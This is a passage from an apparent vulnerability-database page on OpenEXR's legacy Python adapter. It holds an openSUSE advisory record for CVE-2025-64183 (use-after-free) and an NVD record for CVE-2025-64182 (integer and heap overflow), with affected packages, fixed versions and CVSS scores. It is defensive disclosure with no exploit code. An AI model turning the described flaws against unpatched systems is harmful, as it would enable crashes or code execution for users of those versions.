          "text": "OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. In versions 3.2.0 through 3.2.4, 3.3.0 through 3.3.5, and 3.4.0 through 3.4.2, there is a use-after-free in PyObject_StealAttrString of pyOpenEXR_old.cpp. The legacy adapter defines PyObject_StealAttrString that calls PyObject_GetAttrString to obtain a new reference, immediately decrefs it, and returns the pointer. Callers then pass this dangling pointer to APIs like PyLong_AsLong/PyFloat_AsDouble, resulting in a use-after-free. This is invoked in multiple places (e.g., reading PixelType.v, Box2i, V2f, etc.) Versions 3.2.5, 3.3.6, and 3.4.3 fix the issue.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:libIex-3_4-33-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libIex-3_4-33-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libIex-3_4-33-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libIex-3_4-33-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:openexr-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:openexr-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:openexr-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:openexr-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:openexr-devel-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:openexr-devel-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:openexr-devel-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:openexr-devel-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:openexr-doc-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:openexr-doc-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:openexr-doc-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:openexr-doc-3.4.3-1.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2025-64183",
          "url": "https://www.suse.com/security/cve/CVE-2025-64183"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1253235 for CVE-2025-64183",
          "url": "https://bugzilla.suse.com/1253235"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:libIex-3_4-33-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libIex-3_4-33-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libIex-3_4-33-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libIex-3_4-33-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:openexr-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:openexr-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:openexr-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:openexr-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:openexr-devel-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:openexr-devel-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:openexr-devel-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:openexr-devel-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:openexr-doc-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:openexr-doc-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:openexr-doc-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:openexr-doc-3.4.3-1.1.x86_64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 6.2,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "openSUSE Tumbleweed:libIex-3_4-33-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libIex-3_4-33-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libIex-3_4-33-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libIex-3_4-33-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:openexr-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:openexr-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:openexr-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:openexr-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:openexr-devel-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:openexr-devel-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:openexr-devel-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:openexr-devel-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:openexr-doc-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:openexr-doc-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:openexr-doc-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:openexr-doc-3.4.3-1.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2025-11-18T00:00:00Z",
          "details": "moderate"
        }
      ],
      "title": "CVE-2025-64183"
    }
  ]
}

FKIE_CVE-2025-64182

Vulnerability from fkie_nvd - Published: 2025-11-10 22:15 - Updated: 2025-12-08 15:37

Severity ?

7.8 (High) - CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/AcademySoftwareFoundation/openexr/blob/b3a19903db0672c63055023aa788e592b16ec3c5/src/wrappers/python/PyOpenEXR_old.cpp#L528-L536	Product
security-advisories@github.com	https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-vh63-9mqx-wmjr	Exploit, Vendor Advisory
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-vh63-9mqx-wmjr	Exploit, Vendor Advisory

Impacted products

Vendor	Product	Version
openexr	openexr	*
openexr	openexr	*
openexr	openexr	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "B39DE559-AB72-4C61-9E6B-E9125859D199",
              "versionEndExcluding": "3.2.5",
              "versionStartIncluding": "3.2.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "A83D8F0B-0D0A-403E-8D2E-2FB455041B8A",
              "versionEndExcluding": "3.3.6",
              "versionStartIncluding": "3.3.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "78287128-E16E-431F-922F-1F0272327A0D",
              "versionEndExcluding": "3.4.3",
              "versionStartIncluding": "3.4.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. In versions 3.2.0 through 3.2.4, 3.3.0 through 3.3.5, and 3.4.0 through 3.4.2, a memory safety bug in the legacy OpenEXR Python adapter (the deprecated OpenEXR.InputFile wrapper) allow crashes and likely code execution when opening attacker-controlled EXR files or when passing crafted Python objects. Integer overflow and unchecked allocation in InputFile.channel() and InputFile.channels() can lead to heap overflow (32 bit) or a NULL deref (64 bit). Versions 3.2.5, 3.3.6, and 3.4.3 contain a patch for the issue."
    },
    {
      "lang": "es",
      "value": "OpenEXR proporciona la especificaci\u00f3n y la implementaci\u00f3n de referencia del formato de archivo EXR, un formato de almacenamiento de im\u00e1genes para la industria cinematogr\u00e1fica. En las versiones 3.2.0 a la 3.2.4, 3.3.0 a la 3.3.5 y 3.4.0 a la 3.4.2, un error de seguridad de memoria en el adaptador Python heredado de OpenEXR (el envoltorio obsoleto OpenEXR.InputFile) permite fallos y una probable ejecuci\u00f3n de c\u00f3digo al abrir archivos EXR controlados por el atacante o al pasar objetos Python manipulados. El desbordamiento de enteros y la asignaci\u00f3n no verificada en InputFile.channel() e InputFile.channels() pueden conducir a un desbordamiento de mont\u00edculo (32 bits) o a una desreferencia de NULL (64 bits). Las versiones 3.2.5, 3.3.6 y 3.4.3 contienen un parche para el problema."
    }
  ],
  "id": "CVE-2025-64182",
  "lastModified": "2025-12-08T15:37:24.687",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "LOCAL",
          "availabilityImpact": "HIGH",
          "baseScore": 7.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 1.8,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ],
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "LOCAL",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 5.5,
          "baseSeverity": "MEDIUM",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "PROOF_OF_CONCEPT",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "NONE",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "NONE",
          "subIntegrityImpact": "NONE",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "HIGH",
          "vulnConfidentialityImpact": "NONE",
          "vulnIntegrityImpact": "HIGH",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-11-10T22:15:37.120",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Product"
      ],
      "url": "https://github.com/AcademySoftwareFoundation/openexr/blob/b3a19903db0672c63055023aa788e592b16ec3c5/src/wrappers/python/PyOpenEXR_old.cpp#L528-L536"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-vh63-9mqx-wmjr"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-vh63-9mqx-wmjr"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-120"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2025-64182 (GCVE-0-2025-64182)

CERTFR-2026-AVI-0281

Solutions

GHSA-VH63-9MQX-WMJR

Summary

Details

PoC

Impact

OPENSUSE-SU-2025:15741-1

FKIE_CVE-2025-64182

Tags

Sightings

Nomenclature